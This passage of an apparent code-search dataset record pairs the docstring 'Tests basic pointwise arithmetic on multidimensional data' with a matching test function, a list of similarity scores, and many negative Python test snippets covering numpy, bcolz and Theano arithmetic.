math.exp(-ptwise_linear.evaluate(x)), None).evaluate(1.0e6), math.exp(-2.0), 3) # This should absolutely fail and is the wrong way to do it", "def dot(v,w):\n return sum(v_i * w_i for v_i, w_i in zip(v,w)\n\ndef sum_of_squares(v):\n return dot(v, v)\n\nimport math", "def test_func(x, a, b, c, d):\n return a + b * x + c * x**2 + d * x**3" ]
[ "0.6385182", "0.6282518", "0.61600417", "0.61573863", "0.6152449", "0.61160505", "0.60762215", "0.6071223", "0.60207266", "0.6017882", "0.6017163", "0.59854347", "0.59580594", "0.59534204", "0.5947321", "0.591167", "0.5898243", "0.58920926", "0.58749056", "0.58674467", "0.586009", "0.5858972", "0.5850909", "0.5845129", "0.5821008", "0.5808885", "0.58082724", "0.580473", "0.5804137", "0.5803243", "0.58016", "0.5798565", "0.57727706", "0.5769337", "0.5758641", "0.5757021", "0.5756332", "0.57557017", "0.5753458", "0.57384396", "0.5730069", "0.5723253", "0.57109374", "0.5700305", "0.5697601", "0.5696897", "0.56942075", "0.56891096", "0.56865335", "0.5683323", "0.56817", "0.5673172", "0.56720567", "0.5670916", "0.56681114", "0.5660095", "0.56586874", "0.5658196", "0.56543165", "0.56457657", "0.5629596", "0.56266785", "0.5612528", "0.5607722", "0.56047195", "0.5604223", "0.56020576", "0.56008595", "0.56006676", "0.5586253", "0.5579853", "0.55779314", "0.5575959", "0.55754477", "0.5575002", "0.5569858", "0.5560904", "0.55568486", "0.5554909", "0.5554108", "0.55488604", "0.55385023", "0.5528213", "0.55276984", "0.5521267", "0.5520712", "0.55166376", "0.55165476", "0.5515214", "0.5509231", "0.5506815", "0.5505661", "0.55045986", "0.54980767", "0.5495982", "0.5481001", "0.5479907", "0.54779613", "0.5473835", "0.5471621", "0.54711825" ]
0.0
-1
Tests basic pointwise arithmetic on multidimensional data
def test_deep(self, expr, result, mode): i, j, k, l = dimify('i j k l') a = symbol(name='a', dimensions=(i, j, k, l), value=2., mode=mode) b = symbol(name='b', dimensions=(j, k), value=3., mode=mode) fa = a.base.function if mode == 'indexed' else a fb = b.base.function if mode == 'indexed' else b eqn = eval(expr) Operator(eqn)(fa, fb) assert np.allclose(fa.data, result, rtol=1e-12)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_multidimensional_operation(self):\n # start with something (1, 2, 3)\n data = np.array([[[0.0, 1.0, 2.0], [3.0, 4.0, 5.0]]])\n\n # split 1st dim (2, 2, 3)\n coefficients = np.ones((1, 2)) / 2\n expected = np.array(\n [[[0.0, 0.5, 1.0], [1.5, 2.0, 2.5]], [[0.0, 0.5, 1.0], [1.5, 2.0, 2.5]]]\n )\n actual = Adaptor.convert_with_coefficients(data, coefficients, 0)\n np.testing.assert_allclose(actual, expected)\n\n # sum 3rd dim (2, 2, 1)\n coefficients = np.ones((3, 1))\n expected = np.array([[[1.5], [6.0]], [[1.5], [6.0]]])\n actual = Adaptor.convert_with_coefficients(actual, coefficients, 2)\n np.testing.assert_allclose(actual, expected)", "def test_data():\n x = np.array([8, 67, 79, 10, 52, 53, 98, 34, 15, 58], dtype=float)\n y = np.array([24, 87, 48, 94, 98, 66, 14, 24, 60, 16], dtype=float)\n z = np.array([0.064, 4.489, 6.241, 0.1, 2.704, 2.809, 9.604, 1.156,\n 0.225, 3.364], dtype=float)\n\n return x, y, z", "def test_sum_squares(self):\n fun = get_problem('sum_squares', self.dimension)\n self.assertEqual(fun(self.array), 0.0)", "def test01(self):\n a, b = np.arange(self.N), np.arange(1, self.N+1)\n if self.rootdir:\n dirc, dird = self.rootdir+'.c', self.rootdir+'.d'\n else:\n dirc, dird = None, None\n c = bcolz.carray(a, rootdir=dirc)\n d = bcolz.carray(b, rootdir=dird)\n cr = bcolz.eval(\"c * d\")\n nr = a * b\n # print \"bcolz.eval ->\", cr\n # print \"numpy ->\", nr\n assert_array_equal(cr[:], nr, \"eval does not work correctly\")", "def test_points_calculation(self):\n\n assert self.test_shape.points == [\n (1030.0, 525.0),\n (1030.0, 475.0),\n (970.0, 475.0),\n (970.0, 525.0),\n ]", "def test03(self):\n a, b = np.arange(self.N), np.arange(1, self.N+1)\n if self.rootdir:\n dirc, dird = self.rootdir+'.c', self.rootdir+'.d'\n else:\n dirc, dird = None, None\n c = bcolz.carray(a, rootdir=dirc)\n d = bcolz.carray(b, rootdir=dird)\n cr = bcolz.eval(\"a * d\")\n nr = a * b\n # print \"bcolz.eval ->\", cr\n # print \"numpy ->\", nr\n assert_array_equal(cr[:], nr, \"eval does not work correctly\")", "def test02(self):\n a, b = np.arange(self.N), np.arange(1, self.N+1)\n cr = bcolz.eval(\"a * b\", rootdir=self.rootdir)\n nr = a * b\n # print \"bcolz.eval ->\", cr\n # print \"numpy ->\", nr\n assert_array_equal(cr[:], nr, \"eval does not work correctly\")", "def test12(self):\n a, b = np.arange(self.N), np.arange(1, self.N+1)\n c, d = bcolz.carray(a), bcolz.carray(b, rootdir=self.rootdir)\n cr = bcolz.eval(\"c + 2 * d - 3\", out_flavor='numpy')\n nr = a + 2 * b - 3\n # print \"bcolz.eval ->\", cr, type(cr)\n # print \"numpy ->\", nr\n self.assertTrue(type(cr) == np.ndarray)\n assert_array_equal(cr, nr, \"eval does not work correctly\")", "def test_array_mult(self):\n # pylint: disable=no-member\n ident_2_2 = np.array([[1, 1], [1, 1]])\n\n # Unit times a 2D array\n meter_ident_2_2 = self.meter * ident_2_2\n self.assertEqual(meter_ident_2_2[0][0], self.meter)\n self.assertEqual(meter_ident_2_2[0][1], self.meter)\n self.assertEqual(meter_ident_2_2[1][0], self.meter)\n self.assertEqual(meter_ident_2_2[1][1], self.meter)\n\n # 2D arrays multiplying each other (arrays multiply point by\n # point)\n matr_2_2 = np.array([[1, 2], [3, 4]])\n matr_mult = meter_ident_2_2 * matr_2_2\n self.assertEqual(matr_mult[0][0], self.meter)\n self.assertEqual(matr_mult[0][1], 2 * self.meter)\n self.assertEqual(matr_mult[1][0], 3 * self.meter)\n self.assertEqual(matr_mult[1][1], 4 * self.meter)", "def test_results():\n x = 0.5\n np.testing.assert_almost_equal(nbf.sum_x_n_calc(\n x, z_n, k_n_1), npf.sum_x_n_calc(x, z_n, k_n_1))", "def test04(self):\n a, b = np.arange(self.N), np.arange(1, self.N+1)\n if self.rootdir:\n dirc, dird = self.rootdir+'.c', self.rootdir+'.d'\n else:\n dirc, dird = None, None\n c = bcolz.carray(a, rootdir=dirc)\n d = bcolz.carray(b, rootdir=dird)\n cr = bcolz.eval(\"a + 2 * d - 3\")\n nr = a + 2 * b - 3\n # print \"bcolz.eval ->\", cr\n # print \"numpy ->\", nr\n assert_array_equal(cr[:], nr, \"eval does not work correctly\")", "def test_array_sum_equals_one(self):\n plugin = NonLinearWeights(0.85)\n result = plugin.process(self.cube, self.coord_name)\n self.assertAlmostEqual(result.data.sum(), 1.0)", "def test_elemwise_multiple_inputs_optimisation(self):\r\n\r\n shp = (5, 5)\r\n fx, fy, fz = fmatrices('xyz')\r\n dx, dy, dz = dmatrices('xyz')\r\n fv = fvector('r').dimshuffle('x', 0)\r\n dv = dvector('s').dimshuffle('x', 0)\r\n fxv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fyv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fzv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fvv = theano._asarray(numpy.random.rand(shp[0]), dtype=\r\n 'float32').reshape(1, shp[0])\r\n dxv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dyv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dzv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dvv = theano._asarray(numpy.random.rand(shp[0]), dtype=\r\n 'float64').reshape(1, shp[0])\r\n cases = [\r\n (fx + fy, (fx, fy), (fxv, fyv), 1, 'float32'),\r\n (fx * fy, (fx, fy), (fxv, fyv), 1, 'float32'),\r\n# (fx+fy+fz,(fx,fy,fz),(fxv,fyv,fzv),1,'float32'),\r\n# (dx+dy+dz,(dx,dy,dz),(dxv,dyv,dzv),1,'float64'),\r\n# (fx*fy*fz,(fx,fy,fz),(fxv,fyv,fzv),1,'float32'),\r\n# (dx*dy*dz,(dx,dy,dz),(dxv,dyv,dzv),1,'float64'),\r\n# (fx*fy*(fx+fy+fz),(fx,fy,fz),(fxv,fyv,fzv),2,'float32'),\r\n# (dx*dy*(dx+dy+dz),(dx,dy,dz),(dxv,dyv,dzv),2,'float64'),\r\n# (fx*fy*(fx+fy+dz),(fx,fy,dz),(dxv,dyv,dzv),2,'float64'),#check mixed type add\r\n# (dz*fy*(fx+fy),(fx,fy,dz),(dxv,dyv,dzv),2,'float64'),#check mixed type mul\r\n #check with dimshuffle of constant\r\n (fx + fy + fz + 2, (fx, fy, fz), (fxv, fyv, fzv), 1, {'custom':\r\n 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n (fx * fy * fz * 2, (fx, fy, fz), (fxv, fyv, fzv), 1, {'custom':\r\n 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n# (2+fx+fy+fz,(fx,fy,fz),(fxv,fyv,fzv),1,'float32'),\r\n# (2*fx*fy*fz,(fx,fy,fz),(fxv,fyv,fzv),1,'float32'),\r\n (2 + fx + fy + fz + 2, (fx, fy, fz), (fxv, fyv, fzv), 1, {\r\n 'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n (2 * fx * fy * fz * 2, (fx, fy, fz), (fxv, fyv, fzv), 1, {\r\n 'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n# (fx*fy*2*(fx+fy+fz),(fx,fy,fz),(fxv,fyv,fzv),2,'float32'),\r\n# (fx*fy*(2+fx+fy+fz),(fx,fy,fz),(fxv,fyv,fzv),2,'float32'),\r\n (fx * fy * 2 * (fx + fy + fz+2), (fx, fy, fz), (fxv, fyv, fzv), 2, {\r\n 'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n\r\n #check with broadcast of row\r\n# (fx+fy+fz+fv,(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),1,'float32'),\r\n# (fx*fy*fz*fv,(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),1,'float32'),\r\n# (fv+fx+fy+fz,(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),1,'float32'),\r\n# (fv*fx*fy*fz,(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),1,'float32'),\r\n# (fx*fy*fv*(fx+fy+fz),(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),2,'float32'),\r\n# (fx*fy*(fv+fx+fy+fz),(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),2,'float32'),\r\n# (fx*fy*fv*(fv+fx+fy+fz),(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),2,'float32'),\r\n# (dx+dy+dz+dv,(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),1,'float64'),\r\n# (dx*dy*dz*dv,(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),1,'float64'),\r\n# (dv+dx+dy+dz,(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),1,'float64'),\r\n# (dv*dx*dy*dz,(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),1,'float64'),\r\n# (dx*dy*dv*(dx+dy+dz),(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),2,'float64'),\r\n# (dx*dy*(dv+dx+dy+dz),(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),2,'float64'),\r\n# (dx*dy*dv*(dv+dx+dy+dz),(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),2,'float64'),\r\n ] # [10:11]\r\n# print cases\r\n\r\n #We must be sure that the Canonizer is working, but that we don't have other\r\n # optimisation that could hide bug in the Canonizer as local_elemwise_fusion\r\n mode = compile.mode.get_default_mode()\r\n old_optimizer = mode._optimizer\r\n try:\r\n mode._optimizer = gof.Query([\"canonicalize\"])\r\n mode._optimizer = mode._optimizer.excluding(\r\n 'local_elemwise_fusion')\r\n for id, [g, sym_inputs, val_inputs, nb_elemwise, out_dtype] in enumerate(cases):\r\n if isinstance(out_dtype, dict):\r\n out_dtype = out_dtype[config.cast_policy]\r\n f = compile.function(list(sym_inputs), g,\r\n #we need the optimisation enabled, debug do this.\r\n mode=mode)\r\n\r\n out = f(*val_inputs)\r\n assert(len(f.maker.fgraph.toposort()) == nb_elemwise)\r\n assert(out_dtype == out.dtype)\r\n finally:\r\n mode._optimizer = old_optimizer", "def test_fun_result(self):\n x = CArray([3, 5])\n correct_result = x[0] ** 2 + x[1] ** 2\n self._test_fun_result(self.fun, x, correct_result.item())", "def test_basic_calculation(self):\n expected_result = np.array(\n [\n [[0.5, 0.5, 0.0], [0.5, 0.5, 0.4], [0.9, 0.5, 0.4]],\n [[0.5, 0.5, 0.0], [0.5, 0.5, 0.4], [0.9, 0.5, 0.4]],\n ],\n dtype=np.float32,\n )\n result = calculate_sleet_probability(self.rain_prob_cube, self.snow_prob_cube)\n self.assertArrayAlmostEqual(result.data, expected_result)\n self.assertTrue(result.dtype == np.float32)", "def test_alpine1(self):\n fun = get_problem('alpine1', self.dimension, -10.0, 10.0)\n self.assertEqual(fun(self.array), 0.0)", "def test_safe_sum_p_log_p(self):\r\n m = array([2, 4, 0, 8])\r\n self.assertEqual(safe_sum_p_log_p(m, 2), 2 * 1 + 4 * 2 + 8 * 3)", "def TestFunc1(x):\r\n return 12*x[0]*x[0] + 4*x[1]*x[1] - 12*x[0]*x[1] + 2*x[1]", "def test_multiple(self):\n df = self.df.copy()\n out = compositional_mean(df)\n # Check closure\n self.assertTrue(np.allclose(np.sum(out.values, axis=-1), 1.0))", "def test05(self):\n a, b = np.arange(self.N), np.arange(1, self.N+1)\n c, d = bcolz.carray(a, rootdir=self.rootdir), b\n cr = bcolz.eval(\"a + 2 * d - 3\")\n nr = a + 2 * b - 3\n # print \"bcolz.eval ->\", cr\n # print \"numpy ->\", nr\n assert_array_equal(cr[:], nr, \"eval does not work correctly\")", "def check_evaluation_points(x, y):\n assert x.ndim == y.ndim == 1\n assert x.shape == y.shape\n assert x.dtype == y.dtype == np.float64", "def test_simple_2d(self):\r\n a = tt.dmatrix()\r\n increment = tt.dscalar()\r\n sl1 = slice(None)\r\n sl2_end = tt.lscalar()\r\n sl2 = slice(sl2_end)\r\n\r\n for do_set in [False, True]:\r\n\r\n if do_set:\r\n resut = tt.set_subtensor(a[sl1, sl2], increment)\r\n else:\r\n resut = tt.inc_subtensor(a[sl1, sl2], increment)\r\n\r\n f = theano.function([a, increment, sl2_end], resut)\r\n\r\n val_a = numpy.ones((5, 5))\r\n val_inc = 2.3\r\n val_sl2_end = 2\r\n\r\n result = f(val_a, val_inc, val_sl2_end)\r\n\r\n expected_result = numpy.copy(val_a)\r\n if do_set:\r\n expected_result[:, :val_sl2_end] = val_inc\r\n else:\r\n expected_result[:, :val_sl2_end] += val_inc\r\n\r\n utt.assert_allclose(result, expected_result)", "def test_equal13():\n x = np.array([[[[[[True, False, True], [True, False, True], [True, False, True]]]]]])\n y = np.array([[True, False, True], [True, False, True], [True, False, True]])\n res = np.equal(x, y)\n obj.run(res=res, x=x, y=y)", "def CustomMathTest(): \n \n def CheckEqual(iterator):\n return len(set(iterator)) <= 1\n \n print(\"\")\n print(\" ..Testing.. \")\n print(\"\")\n \n Tests = []\n\n #Setup\n c = [1,2,3,nan,3]\n c2 = ma.masked_array(c,isnan(c))\n #Python has a less-comfortable handling of missing values.\n c3 = [2,3,-1,4,0]\n \n\n print(\"Testing MeanNa...\")\n Expected = [1.0, 2.0, 3.0, 2.25, 3.0]\n Actual = MeanNa(c2)\n print(Expected)\n print(Actual)\n print(CheckEqual(Actual==Expected))\n Tests.append(CheckEqual(Actual==Expected))\n print(\"\")\n \n print(\"Testing Catch...\")\n Expected = [0,1,.5,0]\n Actual = [Catch(.4),Catch(.6),Catch(.4,.3),Catch(.4,.1)]\n print(Expected)\n print(Actual)\n print(Actual==Expected)\n Tests.append((Actual==Expected))\n print(\"\")\n \n print(\"Testing Influence...\")\n Expected = [array([ 0.88888889]), array([ 1.33333333]), array([ 1.]), array([ 1.33333333])]\n Actual = Influence(GetWeight(c2))\n print(Expected)\n print(Actual)\n Out = []\n Flag=False\n for i in range(len(Actual)): #rounding problems require an approximation\n Out.append( (Actual[i]-Expected[i])**2)\n if(sum(Out)<.000000000001):\n Flag=True\n print(Flag)\n Tests.append(Flag) \n print(\"\")\n \n print(\"Testing ReWeight...\")\n Expected = [0.08888888888888889, 0.17777777777777778, 0.26666666666666666, 0.2, 0.26666666666666666]\n Actual = ReWeight(c2)\n print(Expected)\n print(Actual)\n print(CheckEqual(Actual==Expected))\n Tests.append(CheckEqual(Actual==Expected))\n print(\"\")\n \n Votes = array([[1,1,0,0], \n [1,0,0,0],\n [1,1,0,0],\n [1,1,1,0],\n [0,0,1,1],\n [0,0,1,1]])\n \n Votes = ma.masked_array(Votes,isnan(Votes))\n \n print(\"Testing ReverseMatrix...\")\n Expected = array([[0, 0, 1, 1],\n [0, 1, 1, 1],\n [0, 0, 1, 1],\n [0, 0, 0, 1],\n [1, 1, 0, 0],\n [1, 1, 0, 0]])\n Actual = ReverseMatrix(Votes)\n print(Expected)\n print(Actual)\n Flag=False\n if(sum(Expected==Actual)==24):\n Flag=True\n print(Flag)\n Tests.append(Flag)\n print(\"\") \n \n print(\"Testing WeightedPrinComp...\")\n Expected = array([-0.81674714, -0.35969107, -0.81674714, -0.35969107, 1.17643821, 1.17643821])\n Actual = WeightedPrinComp(Votes)[1]\n Out = []\n Flag=False\n for i in range(len(Actual)): #rounding problems require an approximation\n Out.append( (Actual[i]-Expected[i])**2)\n if(sum(Out)<.000000000001):\n Flag=True \n print(Flag)\n Tests.append(Flag) \n print(\"\") \n \n print(\" *** TEST RESULTS ***\")\n print(Tests)\n print(CheckEqual(Tests))\n \n return(CheckEqual(Tests))", "def test_scalar_index(self):\n dset = self.f.create_dataset('x', shape=(), dtype='f')\n out = dset[...]\n self.assertIsInstance(out, np.ndarray)\n self.assertEqual(out.shape, ())", "def test_equal14():\n x = np.array([[[[[[True, False, True], [True, False, True], [True, False, True]]]]]])\n y = np.array([[True, False, True], [True, False, True], [True, False, True]])\n res = np.equal(x, y)\n obj.run(res=res, x=x, y=y)", "def test_pinter(self):\n fun = get_problem('pinter', self.dimension, -10.0, 10.0)\n self.assertEqual(fun(self.array), 0.0)", "def test_single(self):\n df = self.df.head(1).copy()\n n = df.index.size\n arr = df.values\n out = np_cross_ratios(arr)\n self.assertTrue(np.isfinite(out).any())\n self.assertTrue((out[np.isfinite(out)] > 0).all())\n self.assertTrue(out.shape == (n, self.d, self.d))", "def test_multiplying(self):\n multiplier = Multiplier()\n\n for i in range(-10, 10):\n for j in range(-10, 10):\n self.assertEqual(i*j, multiplier.calc(j, i))", "def test_scalar_multiplication(self):\n\n a1 = tuples.Tuple([\"a\", \"b\", \"c\", \"d\"], 1, -2, 3, -4)\n a2 = a1 * 3.5\n a3 = a1 * 0.5\n\n self.assertEqual(a2,\n tuples.Tuple([\"a\", \"b\", \"c\", \"d\"], 3.5, -7, 10.5, -14))\n self.assertEqual(a3,\n tuples.Tuple([\"a\", \"b\", \"c\", \"d\"], 0.5, -1, 1.5, -2))", "def testDotProduct(self):\n\n self._check([0.000, 1.000, 0.000], [ 1023, 1023, 1023 ])\n self._check([0.125, 0.750, 0.125], [ 1023, 1023, 1023 ])\n self._check([1/32., 1.000, 0.000], [ 1023, 1023, 1023 ])\n self._check([1.000, 1.000, 1.000], [ 1023, 1023, 1023 ])\n self._check([0, 0, 0], [ 1023, 1023, 1023 ])\n self._check([1/32., 0, 0], [ 1, 100, 100 ])\n self._check([1.0, 0, 0], [ 1, 100, 100 ])\n self._check([0, 1.0, 0], [ 1, 100, 100 ])\n self._check([0, 0, 1.0], [ 1, 100, 100 ])\n self._check([1.000, 1.000, 1.000], [ 513, 513, 513 ])\n self._check([1.000, 1.000, 1.000], [ 512, 512, 512 ])\n self._check([1.000, 1.000, 1.000], [ 0, 512, 0 ])\n\n self._check([0.000, 1.5, 0.000], [ 0, 680, 0 ])\n self._check([0.000, 1.5, 0.000], [ 0, 681, 0 ])\n self._check([0.000, 1.5, 0.000], [ 0, 682, 0 ])\n self._check([0.000, 1.5, 0.000], [ 0, 683, 0 ])\n\n self._check([0.000, 1.5, 0.000], [ 0, 339, 0 ])\n self._check([0.000, 1.5, 0.000], [ 0, 340, 0 ])\n self._check([0.000, 1.5, 0.000], [ 0, 341, 0 ])\n self._check([0.000, 1.5, 0.000], [ 0, 342, 0 ])\n\n self._check([0.000, 1.5, 0.000], [ 0, 1023-338, 0 ])\n self._check([0.000, 1.5, 0.000], [ 0, 1023-339, 0 ])\n self._check([0.000, 1.5, 0.000], [ 0, 1023-340, 0 ])\n self._check([0.000, 1.5, 0.000], [ 0, 1023-341, 0 ])\n\n self._check([0.000, -1.0, 0.000], [ 0, 500, 0 ])\n self._check([1/32., -1.0, 1/32.], [ 500, 500, 500 ])\n self._check([-1/32., -1.0, -1/32.], [ 400, 400, 400 ])\n\n for idx in range(100):\n data = [ random.randint(0,1023) for r in range(3) ]\n coeff = [ max(-2.0, min(127/32., random.random() * 4 - 2)) for r in range(3) ]\n #print coeff, data\n self._check(coeff, data)", "def test_coords():\n x = np.array([8, 67, 79, 10, 52, 53, 98, 34, 15, 58], dtype=float)\n y = np.array([24, 87, 48, 94, 98, 66, 14, 24, 60, 16], dtype=float)\n\n return x, y", "def test_point_within_dimensions_true():\n point = np.array([10, 20])\n image_dimensions = np.array([100, 100])\n assert point_within_dimensions(point, image_dimensions)", "def test_equal15():\n x = np.array([[[[[[True, False, True], [True, False, True], [True, False, True]]]]]])\n y = x\n res = np.equal(x, y)\n obj.run(res=res, x=x, y=y)", "def test_equal11():\n x = np.array([[True, False, True]])\n y = np.array([[[[[True, False, True], [True, False, True], [True, False, True]]]]])\n res = np.equal(x, y)\n obj.run(res=res, x=x, y=y)", "def test_mul(x, y):\n\n assert mul(x, y) == pytest.approx(mul(y, x))", "def test_local_dot22_to_dot22scalar():\r\n A = T.dmatrix()\r\n mode = theano.compile.mode.get_default_mode()\r\n opt = theano.tensor.opt.in2out(\r\n theano.tensor.blas.local_dot22_to_dot22scalar)\r\n mode = mode.__class__(optimizer=opt)\r\n\r\n x = T.dscalar()\r\n y = T.dscalar()\r\n z = T.dscalar()\r\n # make sure to don't have dimshuffle as we don't opt those cases\r\n m = T.dmatrix()\r\n r = T.drow()\r\n for idx, node in enumerate([\r\n #Old working cases\r\n T.mul(_dot22(A, A), x),\r\n T.mul(_dot22(A, A), x, y),\r\n T.mul(_dot22(A, A), x, r),\r\n T.mul(_dot22(A, A), m, x),\r\n T.mul(_dot22(A, A), x, m),\r\n T.mul(_dot22(A, A), x, (m * y)),\r\n T.mul(_dot22(A, A), (m * y), x),\r\n T.mul(_dot22(A, A), x, (r * y)),\r\n T.mul(_dot22(A, A), (r * y), x),\r\n T.mul(_dot22(A, A), (x * y), (m * x)),\r\n T.mul(_dot22(A, A), (r * y), (y * x)),\r\n\r\n # Case that was raising an assert that is fixed in gh-1507\r\n T.mul(_dot22(A, A), (m * y), m),\r\n T.mul(_dot22(A, A), m, (m * y)),\r\n T.mul(_dot22(A, A), (r * y), (m * x)),\r\n\r\n # assert fixed in gh-1507 and opt case added in gh-1515\r\n T.mul(_dot22(A, A), (m * y * z), m),\r\n T.mul(_dot22(A, A), m, (m * y * z)),\r\n\r\n # Opt case added in gh-1515\r\n T.mul(_dot22(A, A), T.mul(m, y, z), m),\r\n T.mul(_dot22(A, A), m, T.mul(m, y, z)),\r\n\r\n #Case that opt later in gh-1515\r\n T.mul(_dot22(A, A), (r * m), (m * x)),\r\n ]):\r\n node2 = theano.tensor.blas.local_dot22_to_dot22scalar.transform(\r\n node.owner)\r\n assert node2\r\n f = theano.function([x, y, z, m, r, A], node,\r\n mode=mode, on_unused_input='ignore')\r\n f(.1, .2, .3, [[1, 2], [3, 4]], [[5, 6]], [[7, 8], [9, 10]])", "def test_1D(self):\n df = pd.DataFrame(self.df.iloc[:, 0].head(1))\n out = compositional_mean(df)\n # Check closure\n self.assertTrue(np.allclose(np.sum(out.values, axis=-1), 1.0))", "def test_sum_mat(self):\n self.init()\n assert sum_mat(self.i64_2) == np.sum(self.i64_2)\n assert sum_mat(self.fi64_2) == np.sum(self.fi64_2)\n assert sum_mat(self.f64_2) == np.sum(self.f64_2)\n assert sum_mat(self.ff64_2) == np.sum(self.ff64_2)", "def test_equal4():\n x = np.array([[1, 2, 3]])\n y = np.array([[[[1, 2, 3], [1, 2, 3], [1, 2, 3]]]])\n res = np.equal(x, y)\n obj.run(res=res, x=x, y=y)", "def test13(self):\n a = bcolz.ones((self.N, 1))\n b = bcolz.zeros(a.shape)\n b = bcolz.eval('a + b')\n self.assertEqual(b.sum(), self.N)", "def test_multiple(self):\n df = self.df.copy()\n n = df.index.size\n arr = df.values\n out = np_cross_ratios(arr)\n self.assertTrue(np.isfinite(out).any())\n self.assertTrue((out[np.isfinite(out)] > 0).all())\n self.assertTrue(out.shape == (n, self.d, self.d))", "def test_sum_cube(self):\n self.init()\n assert sum_cube(self.i64_3) == np.sum(self.i64_3)\n assert sum_cube(self.fi64_3) == np.sum(self.fi64_3)\n assert sum_cube(self.f64_3) == np.sum(self.f64_3)\n assert sum_cube(self.ff64_3) == np.sum(self.ff64_3)\n assert type(sum_cube(self.i64_3)) == int\n assert type(sum_cube(self.fi64_3)) == int\n assert type(sum_cube(self.f64_3)) == float\n assert type(sum_cube(self.ff64_3)) == float", "def test_suite():\r\n test(add_vectors([1, 1], [1, 1]) == [2, 2])\r\n test(add_vectors([1, 2], [1, 4]) == [2, 6])\r\n test(add_vectors([1, 2, 1], [1, 4, 3]) == [2, 6, 4])\r\n test(scalar_mult(5, [1, 2]) == [5, 10])\r\n test(scalar_mult(3, [1, 0, -1]) == [3, 0, -3])\r\n test(scalar_mult(7, [3, 0, 5, 11, 2]) == [21, 0, 35, 77, 14])\r\n test(dot_product([1, 1], [1, 1]) == 2)\r\n test(dot_product([1, 2], [1, 4]) == 9)\r\n test(dot_product([1, 2, 1], [1, 4, 3]) == 12)\r\n test(cross_product([2,3,4], [5,6,7]) == [-3, 6, -3])", "def test_equal7():\n x = randtool(\"float\", -10, 10, [3, 3, 1])\n y = randtool(\"float\", -10, 10, [3, 3, 3, 1])\n res = np.equal(x, y)\n obj.run(res=res, x=x, y=y)", "def test_mcintosh_e(self):\n c = array([1,2,3,1])\n num = sqrt(15)\n den = sqrt(19)\n exp = num/den\n self.assertEqual(mcintosh_e(c), exp)", "def test_multiple_case(self):\r\n\r\n shp = (3, 3)\r\n fx, fy, fz, fw = fmatrices('xyzw')\r\n dx, dy, dz, dw = dmatrices('xyzw')\r\n fv = fvector('r').dimshuffle('x', 0)\r\n dv = dvector('s').dimshuffle('x', 0)\r\n fxv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fyv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fzv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fwv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fvv = theano._asarray(numpy.random.rand(shp[0]), dtype='float32').reshape(1, shp[0])\r\n dxv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dyv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dzv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dwv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dvv = theano._asarray(numpy.random.rand(shp[0]), dtype='float64').reshape(1, shp[0])\r\n\r\n #We must be sure that the Canonizer is working, but that we don't have other\r\n # optimisation that could hide bug in the Canonizer as local_elemwise_fusion\r\n mode = compile.mode.get_default_mode()\r\n old_optimizer = mode._optimizer\r\n try:\r\n mode._optimizer = gof.Query([\"canonicalize\"])\r\n mode._optimizer = mode._optimizer.including('ShapeOpt')\r\n mode._optimizer = mode._optimizer.excluding(\r\n 'local_elemwise_fusion')\r\n\r\n #test x / x -> 1\r\n for id, (g, sym_inputs, val_inputs, out_dtype) in enumerate([(fx/fx,[fx],[fxv],'float32'),\r\n (dx/dx,[dx],[dxv],'float64'),\r\n (fv/fv,[fv],[fvv],'float32'),\r\n (dv/dv,[dv],[dvv],'float64'),\r\n ]):\r\n f = compile.function(list(sym_inputs), g,\r\n mode=mode)\r\n out = f(*val_inputs)\r\n assert (out == numpy.ones(shp, dtype=out_dtype)).all()\r\n topo = f.maker.fgraph.toposort()\r\n if sym_inputs[0].broadcastable[0]:\r\n assert len(topo) == 2\r\n assert isinstance(topo[0].op, Shape_i)\r\n assert isinstance(topo[1].op, tensor.Alloc)\r\n else:\r\n assert len(topo) == 3\r\n assert isinstance(topo[0].op, Shape_i)\r\n assert isinstance(topo[1].op, Shape_i)\r\n assert isinstance(topo[2].op, tensor.Alloc)\r\n assert(out_dtype == out.dtype)\r\n\r\n #test (x * y) / x -> y\r\n for id,(g, sym_inputs, val_inputs, nb_elemwise, out_dtype) in enumerate([\r\n ((dx*dy)/dx,[dx,dy],[dxv,dyv],0,'float64'),\r\n ((fx*fy)/fx,[fx,fy],[fxv,fyv],0,'float32'),\r\n ((dv*dy)/dv,[dv,dy],[dvv,dyv],0,'float64'),\r\n ((fv*fy)/fv,[fv,fy],[fvv,fyv],0,'float32'),\r\n #must broadcast as their is a dimshuffle in the computation\r\n ((dx*dv)/dx,[dx,dv],[dxv,dvv],1,'float64'),\r\n #topo: [Elemwise{second,no_inplace}(x, <TensorType(float64, row)>)]\r\n 